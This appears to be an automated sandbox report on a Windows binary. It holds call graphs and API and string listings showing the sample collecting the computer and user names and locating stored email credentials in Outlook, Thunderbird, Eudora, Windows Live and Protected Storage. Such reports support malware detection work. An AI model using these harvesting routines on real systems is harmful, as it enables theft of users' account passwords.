404785 FreeLibrary 33755->33757 33756 408812 memset 33756->33757 33758 40883c memcpy wcschr 33756->33758 33757->33747 33757->33752 33757->33754 33757->33755 33757->33756 33757->33758 33759 4088c3 LocalFree 33757->33759 33930 40466b _mbscpy 33757->33930 33758->33757 33759->33757 33760 410a9c RegOpenKeyExA 33760->33652 33761->33656 33931 410a9c RegOpenKeyExA 33762->33931 33764 402c7a 33765 402da5 33764->33765 33766 402c87 memset 33764->33766 33765->33661 33932 410b62 RegEnumKeyExA 33766->33932 33768 402d9c RegCloseKey 
33768->33765 33769 410b1e 3 API calls 33770 402ce4 memset sprintf 33769->33770 33933 410a9c RegOpenKeyExA 33770->33933 33772 402d28 33773 402d3a sprintf 33772->33773 33934 402bd1 40 API calls 33772->33934 33935 410a9c RegOpenKeyExA 33773->33935 33778 402cb2 33778->33768 33778->33769 33779 402d9a 33778->33779 33936 402bd1 40 API calls 33778->33936 33937 410b62 RegEnumKeyExA 33778->33937 33779->33768 33780->33664 33781->33668 33782->33672 33784 410816 33783->33784 33785 4107f1 FreeLibrary 33784->33785 33786 403ddd 33785->33786 33786->33677 33938 410a9c RegOpenKeyExA 33787->33938 33789 402ff9 33790 403006 memset 33789->33790 33791 40312c 33789->33791 33939 410b62 RegEnumKeyExA 33790->33939 33791->33681 33793 403122 RegCloseKey 33793->33791 33794 410b1e 3 API calls 33795 403058 memset sprintf 33794->33795 33940 410a9c RegOpenKeyExA 33795->33940 33797 4030a2 memset 33941 410b62 RegEnumKeyExA 33797->33941 33799 4030f9 RegCloseKey 33801 403033 33799->33801 33801->33793 33801->33794 33801->33797 33801->33799 33802 410b62 RegEnumKeyExA 33801->33802 33942 402db3 26 API calls 33801->33942 33802->33801 33804 4032d5 33803->33804 33805 4033a9 33803->33805 33943 4021b6 memset 33804->33943 33818 4034e4 memset memset 33805->33818 33807 4032e1 33944 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33807->33944 33809 4032ea 33810 4032f8 memset GetPrivateProfileSectionA 33809->33810 33945 4023e5 16 API calls 33809->33945 33810->33805 33815 40332f 33810->33815 33812 40339b strlen 33812->33805 33812->33815 33814 403350 strchr 33814->33815 33815->33805 33815->33812 33946 4021b6 memset 33815->33946 33947 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33815->33947 33948 4023e5 16 API calls 33815->33948 33819 410b1e 3 API calls 33818->33819 33820 40353f 33819->33820 33821 40357f 33820->33821 33822 403546 _mbscpy 33820->33822 33826 403985 33821->33826 33949 406d55 strlen _mbscat 33822->33949 33824 403565 _mbscat 33950 4033f0 19 API calls 33824->33950 33951 40466b 
_mbscpy 33826->33951 33830 4039aa 33831 4039ff 33830->33831 33952 40f460 memset memset 33830->33952 33973 40f6e2 33830->33973 33989 4038e8 21 API calls 33830->33989 33833 404785 FreeLibrary 33831->33833 33834 403a0b 33833->33834 33835 4037ca memset memset 33834->33835 33997 444551 memset 33835->33997 33837 4038e2 33837->33691 33901 40f334 335 API calls 33837->33901 33840 40382e 33841 406f06 2 API calls 33840->33841 33842 403843 33841->33842 33843 406f06 2 API calls 33842->33843 33844 403855 strchr 33843->33844 33845 403884 _mbscpy 33844->33845 33846 403897 strlen 33844->33846 33847 4038bf _mbscpy 33845->33847 33846->33847 33848 4038a4 sprintf 33846->33848 34009 4023e5 16 API calls 33847->34009 33848->33847 33851 44b090 33850->33851 33852 40fb10 RegOpenKeyExA 33851->33852 33853 403e7f 33852->33853 33854 40fb3b RegOpenKeyExA 33852->33854 33864 40f96c 33853->33864 33855 40fb55 RegQueryValueExA 33854->33855 33856 40fc2d RegCloseKey 33854->33856 33857 40fc23 RegCloseKey 33855->33857 33858 40fb84 33855->33858 33856->33853 33857->33856 33859 404734 3 API calls 33858->33859 33860 40fb91 33859->33860 33860->33857 33861 40fc19 LocalFree 33860->33861 33862 40fbdd memcpy memcpy 33860->33862 33861->33857 34014 40f802 11 API calls 33862->34014 33865 4070ae GetVersionExA 33864->33865 33866 40f98d 33865->33866 33867 4045db 7 API calls 33866->33867 33875 40f9a9 33867->33875 33868 40fae6 33869 404656 FreeLibrary 33868->33869 33870 403e85 33869->33870 33876 4442ea memset 33870->33876 33871 40fa13 memset WideCharToMultiByte 33872 40fa43 _strnicmp 33871->33872 33871->33875 33873 40fa5b WideCharToMultiByte 33872->33873 33872->33875 33874 40fa88 WideCharToMultiByte 33873->33874 33873->33875 33874->33875 33875->33868 33875->33871 33877 410dbb 9 API calls 33876->33877 33878 444329 33877->33878 34015 40759e strlen strlen 33878->34015 33883 410dbb 9 API calls 33884 444350 33883->33884 33885 40759e 3 API calls 33884->33885 33886 44435a 33885->33886 33887 444212 65 API calls 33886->33887 33888 
444366 memset memset 33887->33888 33889 410b1e 3 API calls 33888->33889 33890 4443b9 ExpandEnvironmentStringsA strlen 33889->33890 33891 4443f4 _strcmpi 33890->33891 33892 4443e5 33890->33892 33893 403e91 33891->33893 33894 44440c 33891->33894 33892->33891 33893->33471 33895 444212 65 API calls 33894->33895 33895->33893 33896->33653 33897->33657 33898->33665 33899->33669 33900->33673 33901->33691 33902->33693 33903->33707 33904->33711 33905->33704 33907 40841c 33906->33907 33908 410a9c RegOpenKeyExA 33907->33908 33908->33720 33909->33726 33910->33726 33911->33730 33912->33732 33913->33726 33914->33735 33915->33741 33916->33741 33917->33744 33918->33741 33920 404656 FreeLibrary 33919->33920 33921 4045e3 LoadLibraryA 33920->33921 33922 404651 33921->33922 33923 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33921->33923 33922->33747 33922->33751 33924 40463d 33923->33924 33925 404643 33924->33925 33926 404656 FreeLibrary 33924->33926 33925->33922 33926->33922 33928 403cd2 33927->33928 33929 40465c FreeLibrary 33927->33929 33928->33760 33929->33928 33930->33757 33931->33764 33932->33778 33933->33772 33934->33773 33935->33778 33936->33778 33937->33778 33938->33789 33939->33801 33940->33801 33941->33801 33942->33801 33943->33807 33944->33809 33945->33810 33946->33814 33947->33815 33948->33815 33949->33824 33950->33821 33951->33830 33990 4078ba 33952->33990 33955 4078ba _mbsnbcat 33956 40f5a3 RegOpenKeyExA 33955->33956 33957 40f5c3 RegQueryValueExA 33956->33957 33958 40f6d9 33956->33958 33959 40f6d0 RegCloseKey 33957->33959 33960 40f5f0 33957->33960 33958->33830 33959->33958 33960->33959 33961 40f675 33960->33961 33994 40466b _mbscpy 33960->33994 33961->33959 33995 4012ee strlen 33961->33995 33963 40f611 33965 404734 3 API calls 33963->33965 33967 40f616 33965->33967 33966 40f69e RegQueryValueExA 33966->33959 33968 40f6c1 33966->33968 33969 40f66a 33967->33969 33971 40f661 LocalFree 33967->33971 33972 40f645 memcpy 33967->33972 
33968->33959 33970 404785 FreeLibrary 33969->33970 33970->33961 33971->33969 33972->33971 33996 40466b _mbscpy 33973->33996 33975 40f6fa 33976 4045db 7 API calls 33975->33976 33977 40f708 33976->33977 33978 404734 3 API calls 33977->33978 33983 40f7e2 33977->33983 33984 40f715 33978->33984 33979 404656 FreeLibrary 33980 40f7f1 33979->33980 33981 404785 FreeLibrary 33980->33981 33982 40f7fc 33981->33982 33982->33830 33983->33979 33984->33983 33985 40f797 WideCharToMultiByte 33984->33985 33986 40f7b8 strlen 33985->33986 33987 40f7d9 LocalFree 33985->33987 33986->33987 33988 40f7c8 _mbscpy 33986->33988 33987->33983 33988->33987 33989->33830 33991 4078e6 33990->33991 33992 4078c7 _mbsnbcat 33991->33992 33993 4078ea 33991->33993 33992->33991 33993->33955 33994->33963 33995->33966 33996->33975 34010 410a9c RegOpenKeyExA 33997->34010 33999 44458b 34000 40381a 33999->34000 34011 410add RegQueryValueExA 33999->34011 34000->33837 34008 4021b6 memset 34000->34008 34002 4445a4 34003 4445dc RegCloseKey 34002->34003 34012 410add RegQueryValueExA 34002->34012 34003->34000 34005 4445c1 34005->34003 34013 444879 30 API calls 34005->34013 34007 4445da 34007->34003 34008->33840 34009->33837 34010->33999 34011->34002 34012->34005 34013->34007 34014->33861 34016 4075c9 34015->34016 34017 4075bb _mbscat 34015->34017 34018 444212 34016->34018 34017->34016 34035 407e9d 34018->34035 34021 44424d 34022 444274 34021->34022 34023 444258 34021->34023 34043 407ef8 34021->34043 34024 407e9d 9 API calls 34022->34024 34056 444196 52 API calls 34023->34056 34031 4442a0 34024->34031 34026 407ef8 9 API calls 34026->34031 34027 4442ce 34053 407f90 34027->34053 34031->34026 34031->34027 34033 444212 65 API calls 34031->34033 34057 407e62 strcmp strcmp 34031->34057 34032 407f90 FindClose 34034 4442e4 34032->34034 34033->34031 34034->33883 34036 407f90 FindClose 34035->34036 34037 407eaa 34036->34037 34038 406f06 2 API calls 34037->34038 34039 407ebd strlen strlen 34038->34039 34040 407ee1 34039->34040 
34041 407eea 34039->34041 34058 4070e3 strlen _mbscat _mbscpy _mbscat 34040->34058 34041->34021 34044 407f03 FindFirstFileA 34043->34044 34045 407f24 FindNextFileA 34043->34045 34046 407f3f 34044->34046 34047 407f46 strlen strlen 34045->34047 34048 407f3a 34045->34048 34046->34047 34052 407f7f 34046->34052 34050 407f76 34047->34050 34047->34052 34049 407f90 FindClose 34048->34049 34049->34046 34059 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34059 34052->34021 34054 407fa3 34053->34054 34055 407f99 FindClose 34053->34055 34054->34032 34055->34054 34056->34021 34057->34031 34058->34041 34059->34052 34060->33485 34061->33488 34062->33496 34063->33495 34064->33502 34065->33499 34066->33494 34075 411853 RtlInitializeCriticalSection memset 34076 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34250 40a256 13 API calls 34252 432e5b 17 API calls 34254 43fa5a 20 API calls 34078 401060 41 API calls 34257 427260 CloseHandle memset memset 34082 405868 9 API calls 33159 410c68 FindResourceA 33160 410c81 SizeofResource 33159->33160 33161 410cae 33159->33161 33160->33161 33162 410c92 LoadResource 33160->33162 33162->33161 33163 410ca0 LockResource 33162->33163 33163->33161 34259 405e69 14 API calls 34084 433068 15 API calls __fprintf_l 34261 414a6d 18 API calls 34262 43fe6f 135 API calls 34086 424c6d 15 API calls __fprintf_l 34263 426741 19 API calls 34088 440c70 17 API calls 34089 443c71 44 API calls 34092 427c79 24 API calls 34266 416e7e memset __fprintf_l 34096 42800b 47 API calls 34097 425115 85 API calls __fprintf_l 34269 41960c 61 API calls 34098 43f40c 123 API calls __fprintf_l 34101 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34102 43f81a 20 API calls 34104 414c20 memset memset 34105 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34273 414625 18 API calls 34274 404225 modf 34275 403a26 strlen WriteFile 34277 40422a 12 API calls 34281 427632 memset memset memcpy 34282 40ca30 59 API calls 34283 404235 
26 API calls 34106 42ec34 61 API calls __fprintf_l 34107 425115 76 API calls __fprintf_l 34284 425115 77 API calls __fprintf_l 34286 44223a 38 API calls 34113 43183c 113 API calls 34287 44b2c5 _onexit __dllonexit 34292 42a6d2 memcpy __allrem 34115 405cda 65 API calls 34300 43fedc 139 API calls 34301 4116e1 16 API calls __fprintf_l 34118 4244e6 19 API calls 34120 42e8e8 128 API calls __fprintf_l 34121 4118ee RtlLeaveCriticalSection 34306 43f6ec 22 API calls 34123 425115 119 API calls __fprintf_l 33149 410cf3 EnumResourceNamesA 34309 4492f0 memcpy memcpy 34311 43fafa 18 API calls 34313 4342f9 15 API calls __fprintf_l 34124 4144fd 19 API calls 34315 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34316 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34319 443a84 _mbscpy 34321 43f681 17 API calls 34127 404487 22 API calls 34323 415e8c 16 API calls __fprintf_l 34131 411893 RtlDeleteCriticalSection __fprintf_l 34132 41a492 42 API calls 34327 403e96 34 API calls 34328 410e98 memset SHGetPathFromIDList SendMessageA 34134 426741 110 API calls __fprintf_l 34135 4344a2 18 API calls 34136 4094a2 10 API calls 34331 4116a6 15 API calls __fprintf_l 34332 43f6a4 17 API calls 34333 440aa3 20 API calls 34335 427430 45 API calls 34139 4090b0 7 API calls 34140 4148b0 15 API calls 34142 4118b4 RtlEnterCriticalSection 34143 4014b7 CreateWindowExA 34144 40c8b8 19 API calls 34146 4118bf RtlTryEnterCriticalSection 34340 42434a 18 API calls __fprintf_l 34342 405f53 12 API calls 34154 43f956 60 API calls 34156 40955a 17 API calls 34157 428561 36 API calls 34158 409164 7 API calls 34346 404366 19 API calls 34350 40176c ExitProcess 34353 410777 42 API calls 34163 40dd7b 51 API calls 34164 425d7c 16 API calls __fprintf_l 34355 43f6f0 25 API calls 34356 42db01 22 API calls 34165 412905 15 API calls __fprintf_l 34357 403b04 54 API calls 34358 405f04 SetDlgItemTextA GetDlgItemTextA 34359 44b301 ??3@YAXPAX 34362 4120ea 14 API calls 3 library calls 34363 40bb0a 8 
API calls 34365 413f11 strcmp 34169 434110 17 API calls __fprintf_l 34172 425115 108 API calls __fprintf_l 34366 444b11 _onexit 34174 425115 76 API calls __fprintf_l 34177 429d19 10 API calls 34369 444b1f __dllonexit 34370 409f20 _strcmpi 34179 42b927 31 API calls 34373 433f26 19 API calls __fprintf_l 34374 44b323 FreeLibrary 34375 427f25 46 API calls 34376 43ff2b 17 API calls 34377 43fb30 19 API calls 34186 414d36 16 API calls 34188 40ad38 7 API calls 34379 433b38 16 API calls __fprintf_l 34380 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34192 426741 21 API calls 34193 40c5c3 125 API calls 34195 43fdc5 17 API calls 34381 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34198 4161cb memcpy memcpy memcpy memcpy 33164 44b3cf 33165 44b3e6 33164->33165 33168 44b454 33164->33168 33165->33168 33171 44b40e 33165->33171 33167 44b405 33167->33168 33169 44b435 VirtualProtect 33167->33169 33169->33168 33170 44b444 VirtualProtect 33169->33170 33170->33168 33172 44b413 33171->33172 33175 44b454 33172->33175 33178 44b42b 33172->33178 33174 44b41c 33174->33175 33176 44b435 VirtualProtect 33174->33176 33176->33175 33177 44b444 VirtualProtect 33176->33177 33177->33175 33179 44b431 33178->33179 33180 44b435 VirtualProtect 33179->33180 33182 44b454 33179->33182 33181 44b444 VirtualProtect 33180->33181 33180->33182 33181->33182 34386 43ffc8 18 API calls 34199 4281cc 15 API calls __fprintf_l 34388 4383cc 111 API calls __fprintf_l 34200 4275d3 41 API calls 34389 4153d3 22 API calls __fprintf_l 34201 444dd7 _XcptFilter 34394 4013de 15 API calls 34396 425115 111 API calls __fprintf_l 34397 43f7db 18 API calls 34400 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34203 4335ee 16 API calls __fprintf_l 34402 429fef 11 API calls 34204 444deb _exit _c_exit 34403 40bbf0 138 API calls 34207 425115 79 API calls __fprintf_l 34407 437ffa 22 API calls 34211 4021ff 14 API calls 34212 43f5fc 150 API calls 34408 40e381 9 API calls 34214 405983 28 API calls 34215 42b186 
27 API calls __fprintf_l 34216 427d86 76 API calls 34217 403585 20 API calls 34219 42e58e 18 API calls __fprintf_l 34222 425115 75 API calls __fprintf_l 34224 401592 8 API calls 33150 410b92 33153 410a6b 33150->33153 33152 410bb2 33154 410a77 33153->33154 33155 410a89 GetPrivateProfileIntA 33153->33155 33158 410983 memset _itoa WritePrivateProfileStringA 33154->33158 33155->33152 33157 410a84 33157->33152 33158->33157 34412 434395 16 API calls 34226 441d9c memcmp 34227 40c599 43 API calls 34415 426741 87 API calls 34231 4401a6 21 API calls 34233 426da6 memcpy memset memset memcpy 34234 4335a5 15 API calls 34236 4299ab memset memset memcpy memset memset 34237 40b1ab 8 API calls 34420 425115 76 API calls __fprintf_l 34422 43f7b2 120 API calls 34424 4113b2 18 API calls 2 library calls 34428 40a3b8 memset sprintf SendMessageA 33183 410bbc 33186 4109cf 33183->33186 33187 4109dc 33186->33187 33188 410a23 memset GetPrivateProfileStringA 33187->33188 33189 4109ea memset 33187->33189 33194 407646 strlen 33188->33194 33199 4075cd sprintf memcpy 33189->33199 33192 410a0c WritePrivateProfileStringA 33193 410a65 33192->33193 33195 40765a 33194->33195 33196 40765c 33194->33196 33195->33193 33197 4076a3 33196->33197 33200 40737c strtoul 33196->33200 33197->33193 33199->33192 33200->33196 34239 40b5bf memset memset _mbsicmp

                                                                            Control-flow Graph

                                                                            [Control-flow graph nodes and edges for block 4082cd-40841a; calls: memset * 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar * 2, strlen * 2, memcpy]
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040832F
                                                                            • memset.MSVCRT ref: 00408343
                                                                            • memset.MSVCRT ref: 0040835F
                                                                            • memset.MSVCRT ref: 00408376
                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                            • strlen.MSVCRT ref: 004083E9
                                                                            • strlen.MSVCRT ref: 004083F8
                                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                            • String ID: 5$H$O$b$i$}$}
                                                                            • API String ID: 1832431107-3760989150
                                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                            Control-flow Graph

                                                                            [Control-flow graph nodes and edges for block 407ef8-407f8f; calls: FindFirstFileA, FindNextFileA, strlen * 2, subcalls 407f90 and 4070e3]
                                                                            APIs
                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                            • strlen.MSVCRT ref: 00407F64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindstrlen$FirstNext
                                                                            • String ID: ACD
                                                                            • API String ID: 379999529-620537770
                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00401E8B
                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                            • strlen.MSVCRT ref: 00401F06
                                                                            • memset.MSVCRT ref: 00401FB1
                                                                            • atoi.MSVCRT(?), ref: 00401FE0
                                                                            • memset.MSVCRT ref: 00402003
                                                                            • sprintf.MSVCRT ref: 00402030
                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                            • memset.MSVCRT ref: 00402086
                                                                            • memset.MSVCRT ref: 0040209B
                                                                            • strlen.MSVCRT ref: 004020A1
                                                                            • strlen.MSVCRT ref: 004020AF
                                                                            • strlen.MSVCRT ref: 004020E2
                                                                            • strlen.MSVCRT ref: 004020F0
                                                                            • memset.MSVCRT ref: 00402018
                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                            • API String ID: 1846531875-4223776976
                                                                            • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                            • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                            • API String ID: 745651260-375988210
                                                                            • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                            • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                            Strings
                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                            • pstorec.dll, xrefs: 00403C30
                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                            • API String ID: 1197458902-317895162
                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                            Control-flow Graph

                                                                            • Graph image not reproduced; recoverable summary: function 444c4a-444e0f, basic blocks call 444e38, GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, 444e34, __setusermatherr, 444e22, _initterm, __getmainargs, GetStartupInfoA, 40cf44, _cexit, 444e71 and exit (nodes marked Executed / Not Executed in the original rendering)
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                            • String ID: k4w
                                                                            • API String ID: 3662548030-446051039
                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                            Control-flow Graph

                                                                            • Graph image not reproduced; recoverable summary: function 40fb00-40fc3d, basic blocks call 44b090, RegOpenKeyExA (twice), RegQueryValueExA, 404734, 4047a5, memcpy (twice), 40f802, LocalFree and RegCloseKey (twice) (nodes marked Executed / Not Executed in the original rendering)
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                            • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
